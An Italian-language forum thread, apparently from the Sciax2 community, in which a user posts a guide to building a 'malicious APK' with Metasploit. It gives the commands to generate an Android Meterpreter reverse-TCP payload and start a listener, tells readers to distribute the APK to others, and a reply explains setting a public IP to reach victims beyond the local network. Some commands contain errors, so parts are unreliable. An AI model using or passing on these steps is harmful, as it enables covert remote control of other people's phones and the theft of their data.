• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida creare un apk dannoso

oscarandrea

Utente Colossal
Autore del topic
23 Novembre 2013
3.293
101
Miglior risposta
0
Di cosa abbiamo bisogno:

1) Una distribuzione linux con metasploit (consiglio Parrot security os che ha metasploit preinstallato)

2)Un dispositivo android

————————————————

Per prima cosa avviamo metasploit:

dal nostro terminale root digitate:

msfconsole

Se non avete avvaito il terminale come root digitate:

sudo msfconsole



Aspettiamo qualche secondo e ci uscirà l’interfaccia di metasploit (Può variare ad ogni avvio)

adesso apriamo un altro terminale (lasciando l’altro aperto) e digitiamo:

ifconfig

segnamoci il nostro ip locale.

Ritorniamo all’altro terminale e digitiamo:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > nomequalsiasi.apk

NB: X.X.X.X dovete sostituirlo con il vostro ip locale.

Adesso apriamo un altro terminale e chiudiamo quello precedente, digitiamo:

msfconsole

Poi:

use exploiter/multi/handler

Poi:

set payload android/meterpreter/reverse_tcp

Poi:

set LHOST X.X.X.X

Poi:

set LPORT 4444

Poi:

exploit

Adesso Non ci resterà che distribuire il nostro apk,Che troveremo nella nostra home(Nella home dovete abilitare i file nascosti con ctrl+h)



Vi ricordo che non sempre funzionerà,questo è dovuto magari ad antivirus prenseti nel dispositivo android etc.

Questa guida è a solo scopo informativo, io non mi assumo nessuna responsabilità dell’uso delle informazioni che vi ho dato.
fonte guida(IL mio sito):
Perfavore, Entra oppure Registrati per vedere i Link!
 
segnamoci il nostro ip locale

in questo modo limitiamo la connessione reverse ai dispositivi connessi in rete. In teoria se si volesse distribuire l'apk ad altre persone non connesse nella stessa Lan, bisogna inserire nel campo host l'indirizzo pubblico ^^
 
in questo modo limitiamo la connessione reverse ai dispositivi connessi in rete. In teoria se si volesse distribuire l'apk ad altre persone non connesse nella stessa Lan, bisogna inserire nel campo host l'indirizzo pubblico ^^
Si non avevo specificato
;)
LHOST =Local host
Host = Collegamento